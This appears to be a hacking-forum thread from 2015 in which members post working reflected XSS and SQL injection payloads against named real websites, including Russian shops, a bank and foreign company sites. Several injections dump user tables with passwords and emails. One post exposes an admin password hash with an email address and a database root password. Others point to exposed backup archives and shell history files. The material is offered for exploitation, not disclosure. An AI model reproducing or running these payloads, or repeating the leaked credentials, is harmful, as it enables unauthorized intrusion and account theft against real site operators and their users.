SQLi, XSS and other vulnerabilities.

Discussion in 'Sandbox' started by Егорыч+++, 10 May 2015.

  1. SaNDER

    SaNDER Banned

    Link: onlinetrade.ru
    Type: semi-active; it works for a while, then you have to enter the URL with the script again.

    Code:
    www.onlinetrade.ru/member/login?url=%2522%253E%253Cscript%253Ealert()%253C%2fscript%253E&c=399581"><script>alert("WH")</script>> 
     
  2. SaNDER

    SaNDER Banned

    Link: patee.ru
    Type: XSS-Reflected
    Code:
    "><script>alert("WH")</script>
    Register and create a recipe.
    Enter the script in "Dish name", "Dish description" and also in "Cooking stage".
    Where the proportion number goes, enter any number (just not too large).
    "Cooking time in minutes" likewise.
    Don't forget to add ingredients(!), any at random (I picked 4).
    Then submit and see the XSS-Reflected.
     
  3. yarbabin

    yarbabin HACKIN YO KUT

    Get your definitions straight.
     
  4. tipa_cracker

    tipa_cracker New Member

  5. DDShadoww

    DDShadoww New Member

    Target: alfa.com.tw
    Type: XSS Reflected

    Code:
    http://www.alfa.com.tw/search.php?keyword="><script>alert(1)</script>
    And for Safari and Chrome, an iframe works if a closing tag is present.
     
  6. Filipp

    Filipp Member

    XSS-reflected:
    Code:
    www.topglobus.ru/sachy/ridici/sachy-hra2.php?id=4181471&pozz=4'%22()%26%25<acx><ScRiPt%20>prompt(935766)</ScRiPt>
     
  7. joelblack

    joelblack Reservists Of Antichat

    target: http://www.unifinbank.ru/
    type: XSS Reflected

    Search field:
    Code:
    "><script>alert('hello')</script>
     
  8. R3hab

    R3hab Member

    STREIT Group - Armored Cars Manufacturer
    HTML:
    http://www.armored-cars.com/vehicle/view_add.php?vid=-7%20/*!50000union*/%20distinct%20select%201,2,3,4,5,version(),7,8,9
    TIC 30
    PR 3
    AR 969,040

    5.5.42-MariaDB-cll-lve

    Make Free Bitcoin
    HTML:
    http://www.makefreebitco.in/news.php?id=-5'%20/*!50000union*/%20distinct%20select%201,version(),3,4--+f

    AR 149,492
    5.5.42-37.1

    Traffic 140K

    SMS PARIAZ - Accueil
    Joomla; whoever needs it can finish it off
    HTML:
    http://www.smspariaz.com/race/turf2.php?mid=-7%20union%20select%201,2,version(),4,5,6,7,8,9,10,11,12--+f

    PR 2
    AR 322,679
    5.6.23
    Traffic 120K

     
    #188 R3hab, 22 Sep 2015
    Last edited: 22 Sep 2015
  9. DDShadoww

    DDShadoww New Member

    Target: 220-volt.ru
    Type: XSS Reflected

    Code:
    www.220-volt.ru/search/?q=</script><script>confirm(1)</script>
     
  10. tipa_cracker

    tipa_cracker New Member

    It seems to me that here ( http://www.girlplays.ru/ ) there are zero vulnerabilities in the search...
     
  11. ocheretko

    ocheretko Banned

    That's right.
    Code:
    $P$BVX.b8gaC9KdVELsexne9KZawfO70G0 | admin  | rusakov1971@inbox.ru
    
      Method: POST
      Type: UNION query
      Title: MySQL UNION query (random number) - 7 columns
      Payload: search=-8718') UNION ALL SELECT CONCAT(0x717a707171,0x7a507250687641477a52,0x7170626a71),1342,1342,1342,1342,1342,1342#&submit_s=
    Code:
    define('DB_USER', 'root');
    define('DB_PASSWORD', '89039486893');
    define('DB_HOST', 'localhost');
    
     
    #191 ocheretko, 25 Sep 2015
    Last edited: 25 Sep 2015
  12. SaNDER

    SaNDER Banned

    Target:
    Code:
    _ttp://good-steam.ru/backup.zip
    Type: Backup
     
    #192 SaNDER, 29 Sep 2015
    Last edited: 3 Oct 2015
  13. SaNDER

    SaNDER Banned

    Target: salrium.ru
    Type: XSS-Reflected
    Code:
    salrium.ru/resp_block.php?id_goods=1728083"><script>alert("WH")</script>
    or like this
    http://salrium.ru/resp_block.php?id_goods=1728083%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28908717%29%3C/ScRiPt%3E&page=2
    This also works: salrium.ru/resp_block.php?id_goods="><script>alert("WH")</script>
     
  14. SaNDER

    SaNDER Banned

    Target: _ttp://steam-extra.ru/listing.php?category_id=40049
    Type: XSS-Reflected
    Code:
    "><script>alert("WH")</script>
    or
    Code:
    '"()&%<acx><ScRiPt >prompt(916773)</ScRiPt>
    Or your own.
     
    #194 SaNDER, 29 Sep 2015
    Last edited: 3 Oct 2015
  15. zigen

    zigen New Member

    Target: http://www.archetype.co.uk/search.php
    Type: XSS-Reflected
    Code:
    "><script>alert("OOPS")</script>


    But it seems an SQLi could also be worked up there; there is an error under the search field.
     
  16. AlexG

    AlexG Member

    You're right:

    Target: archetype.co.uk
    Type: SQLi error based
    Exploit:
    Code:
    Get: http://www.archetype.co.uk/search.php
    Post-data: search=123" and extractvalue(0x0a,concat(0x0a,(select concat(version(),0x3a,database(),0x3a,current_user)))) and 1="1 -- &submit.x=91&submit.y=9&status[]=Recent&status[]=Current&status[]=Forthcoming
    
    DB-name: archetyp_db
    DB-user: archetype
    Version: 5.1.73-cll
    P.S. There may be a more elegant solution, but this is how it worked out for me :)

    UPD: After poking around by hand, it turned out that the passwords are in MD5 and simply don't fit in the output (this method is limited to 31 characters). I found this solution (64-character limit):
    Code:
    Get: http://www.archetype.co.uk/search.php
    Post-data: search=123" and (select 1 from (Select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x) and 1="1 -- &submit.x=91&submit.y=9&status[]=Recent&status[]=Current&status[]=Forthcoming
    
     
    #196 AlexG, 6 Oct 2015
    Last edited: 9 Oct 2015
  17. ubepkr

    ubepkr Member

    Target: http://www.gaspforair.org
    Vulnerability: SQLi
    Code:
    http://www.gaspforair.org/gasp/gedc/artcl-new.php?ID=115 +UNION+ALL+SELECT+1,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(housing_user)WHERE(@x)IN(@x:=CONCAT(0x20,@x,userlevel,0x3a,username,0x3a,password,0x3c62723e))))x),3,4,5--
    Target: http://www.sequentialtart.com
    Vulnerability: SQLi
    Code:
    http://www.sequentialtart.com/article.php?id=-445+UNION+ALL+SELECT+1,2,3,4,(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(seqtartprod.IPM_users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x3a,password,0x3a,email,0x3c62723e))))x),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
    I ran the last one through DirB and was surprised: http://www.sequentialtart.com/.bash_history and http://www.sequentialtart.com/.mysql_history
    Why stop there, /etc/shadow should be made public too!)))


    I'll add:
    Target: http://yrmusic.com
    Vulnerability: SQLi
    Code:
    http://yrmusic.com/v2/artists/bios/artist.php?ID=-84+UNION+ALL+SELECT+1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
    Target: http://www.zam.it
    Vulnerability: SQLi
    Code:
    http://www.zam.it/home.php?id_autore=234 +UNION+ALL+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4,5,6,7,8,9,10 --
    Off-topic about the address above: alongside Firefox (HackBar with DIOS), whether hungover or just lazy, I launched Havij. And so (this isn't the first time I've observed it), believe it or not, it lies)) Don't trust Havij, because it claims there are 2 tables here, when in fact there are 10)) Try the last address via a query and via this little program))

    Target: http://sh.newsun.dk
    Vulnerability: SQLi
    Code:
    http://sh.newsun.dk/vis.php?id=189+UNION+ALL+SELECT+1,2,3,4,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),6,7,8--
     
    #197 ubepkr, 13 Oct 2015
    Last edited: 13 Oct 2015
  18. R3hab

    R3hab Member

    DUS Architects Amsterdam
    Type:SQLi

    HTML:
    http://www.dusarchitects.com/news.php?newsid=-8%27%20union%20select%201,2,3,version(),5,6,7--+f
    TIC 20
    PR 5

    5.6.23-LOG
     
  19. DDShadoww

    DDShadoww New Member

    Target: http://motivtelecom.ru
    Type: XSS Reflected

    Code:
    motivtelecom.ru/sverdlovsk-oblast/search?search_text="><script>alert(1)<%2Fscript>
     
  20. R3hab

    R3hab Member

    YogaBugs
    Type : SQLi
    HTML:
    http://www.yogabugs.com/shop_item.php?id=-3%20union%20select%201,2,version(),4,5,6,7,8,9,10,11--+f
    PR 3
    5.5.44-0ubuntu0.14.04.1
     